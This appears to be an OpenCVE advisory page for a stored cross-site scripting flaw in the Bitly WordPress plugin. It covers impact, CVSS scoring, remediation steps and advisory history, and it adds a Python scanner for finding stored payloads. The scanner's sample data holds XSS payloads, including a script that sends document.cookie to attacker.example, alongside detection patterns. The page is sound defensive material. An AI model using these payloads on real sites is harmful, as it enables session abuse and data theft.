Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly wp-bitly allows Stored XSS. This issue affects Bitly: from n/a through <= 2.8.0.
Published: 2025-09-22
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Bitly WordPress plugin (wp-bitly), version 2.8.0 and earlier, fails to neutralize attacker-controlled input before writing it into a generated page. This is CWE-79, which is an output-encoding weakness rather than an input-validation one: the data is accepted and stored, then echoed into HTML without escaping. An authenticated user with low privileges can save script in a field the plugin later renders, and that script executes in the browser of anyone who views the affected page, which may include administrators. Because WordPress sets its authentication cookies as HttpOnly by default, the realistic payoff is usually not reading document.cookie but performing actions with the victim's privileges from inside the victim's browser session, such as changing settings or creating accounts if the viewer is an administrator.

Affected Systems

The vulnerable component is the Bitly WordPress plugin, published under the vendor name bitlydeveloper with the slug wp-bitly. Every installation running version 2.8.0 or earlier is affected. Note that the advisory was initially scoped to <= 2.7.4 and later widened to <= 2.8.0, so a site that upgraded to 2.8.0 on the strength of the first advisory is still exposed. The plugin is used by WordPress sites that shorten and share post links through Bitly.

Risk and Exploitability

The CVSS 3.1 base score of 6.5 (vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L) places the flaw at medium severity. It is reachable over the network with low attack complexity, but the attacker needs an authenticated account with low privileges (PR:L), a victim must load the affected page (UI:R), and the payload then runs in the victim's browser rather than in the plugin's own security context (S:C), with limited impact on confidentiality, integrity and availability (C:L/I:L/A:L). The EPSS estimate below 1% and the SSVC assessment recorded on this page (Exploitation: none, Automatable: no, Technical Impact: partial) indicate no observed exploitation at the time of writing, and the vulnerability is not in the CISA KEV catalog. Practical exploitation means a low-privileged user saves a payload that the plugin stores and later renders for other visitors; which roles can reach the plugin's input depends on the site's configuration. Exposure is therefore greatest on multi-author sites and sites with open registration, and smallest where only trusted administrators can write to the plugin's fields.

Generated by OpenCVE AI on April 30, 2026 at 01:22 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade the Bitly WordPress plugin to a release newer than 2.8.0 as soon as the vendor publishes one. This page records no vendor fix or workaround, and the affected range has already been widened once (from <= 2.7.4 to <= 2.8.0), so confirm in the plugin changelog that the release you install actually addresses this issue rather than assuming the next version does.
  • Audit the data the plugin has stored (its options and any post or user metadata it writes) for script tags, inline event handlers and javascript: URLs, and delete or re-encode anything that does not belong there. Stored XSS persists until the payload itself is removed, so patching alone does not clean a site that has already been seeded.
  • Until a fixed release is available, limit which roles can reach the plugin's input, deactivate the plugin if that is not practical, and consider a Content-Security-Policy header as defense in depth to reduce the impact of any script that still executes.
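The second action above (finding payloads that are already stored) is the step most often skipped, so here is a triage scanner written as an added example for this page. It is not the Bitly plugin's code or OpenCVE's; it takes (name, value) rows such as you would export from wp_options or wp_postmeta and flags values containing markup that a link-shortener plugin has no business storing. The option names are hypothetical placeholders (the page does not list the plugin's real keys), and the rows are constructed sample data.

```python
"""Triage scanner for stored XSS payloads in WordPress plugin data.

Added example, not code from the Bitly plugin or OpenCVE. Reads (name, value)
rows as exported from wp_options / wp_postmeta and reports values that contain
script-bearing markup. Option names below are hypothetical; rows are constructed.
"""
import html
import re
import urllib.parse
from typing import Iterable, List, Tuple

# (label reported to the analyst, pattern). Deliberately loose: this is a
# first-pass filter for an incident responder, not an HTML parser, and it
# will flag the odd benign string such as "only=1" for a human to dismiss.
SUSPICIOUS = [
    ("script tag", re.compile(r"<\s*script\b", re.I)),
    ("inline event handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript: URL", re.compile(r"javascript\s*:", re.I)),
    ("embedded document/svg", re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I)),
]


def normalize(value: str) -> str:
    """Undo one layer of percent-encoding and HTML-entity encoding so payloads
    stored as '%3Cscript%3E' or '&lt;script&gt;' are not missed. One layer is
    enough for triage; run a second pass if you suspect double encoding."""
    return html.unescape(urllib.parse.unquote(value))


def scan_rows(rows: Iterable[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (row name, reason) for every row matching a suspicious pattern."""
    hits: List[Tuple[str, str]] = []
    for name, value in rows:
        text = normalize(value)
        for label, pattern in SUSPICIOUS:
            if pattern.search(text):
                hits.append((name, label))
                break  # one reason per row is enough for triage
    return hits


# Constructed sample rows. Names are hypothetical; the token is a dummy value.
SAMPLE_ROWS = [
    ("wpbitly_domain", "bit.ly"),
    ("wpbitly_token", "0123456789abcdef0123456789abcdef"),
    ("wpbitly_last_url", "https://bit.ly/3xAmPl3"),
    ("wpbitly_custom_title",
     'Read more <script>fetch("https://attacker.example/?c="+document.cookie)</script>'),
    ("wpbitly_banner", "<img src=x onerror=alert(1)>"),
    ("wpbitly_encoded", "&lt;script&gt;alert(1)&lt;/script&gt;"),
    ("postmeta_123_bitly_url", "javascript:alert(document.domain)"),
]

if __name__ == "__main__":
    for name, reason in scan_rows(SAMPLE_ROWS):
        print(f"{name}: {reason}")
```

In practice you would feed it real rows, for example by exporting the option table with WP-CLI (`wp option list --format=json`) or a SQL dump of wp_options and wp_postmeta, and then inspect each hit by hand: the scanner tells you where to look, not whether a value is definitely malicious.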



Advisories
Source: EUVD
ID: EUVD-2025-30574
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics (cvssV3_1)
  Value: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
  Removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4.
  Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly wp-bitly allows Stored XSS.This issue affects Bitly: from n/a through <= 2.8.0.
Type: Title
  Removed: WordPress Bitly Plugin <= 2.7.4 - Cross Site Scripting (XSS) Vulnerability
  Added: WordPress Bitly plugin <= 2.8.0 - Cross Site Scripting (XSS) vulnerability
Type: References (changed)
Type: Metrics (cvssV3_1)
  Value: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


Tue, 23 Sep 2025 17:15:00 +0000

Type: Metrics (ssvc)
  Value: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Tue, 23 Sep 2025 16:15:00 +0000

Type: First Time appeared
  Added: Bitly; Bitly bitly; Wordpress; Wordpress wordpress
Type: Vendors & Products
  Added: Bitly; Bitly bitly; Wordpress; Wordpress wordpress

Mon, 22 Sep 2025 18:30:00 +0000

Type: Description
  Added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bitlydeveloper Bitly allows Stored XSS. This issue affects Bitly: from n/a through 2.7.4.
Type: Title
  Added: WordPress Bitly Plugin <= 2.7.4 - Cross Site Scripting (XSS) Vulnerability
Type: Weaknesses
  Added: CWE-79
Type: References (added)
Type: Metrics (cvssV3_1)
  Added: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}


MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:13:42.699Z

Reserved: 2025-08-27T16:19:27.210Z

Link: CVE-2025-58231

Vulnrichment

Updated: 2025-09-23T15:56:19.791Z

NVD

Status: Deferred

Published: 2025-09-22T19:16:08.193

Modified: 2026-04-23T15:33:20.897

Link: CVE-2025-58231

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T01:30:24Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')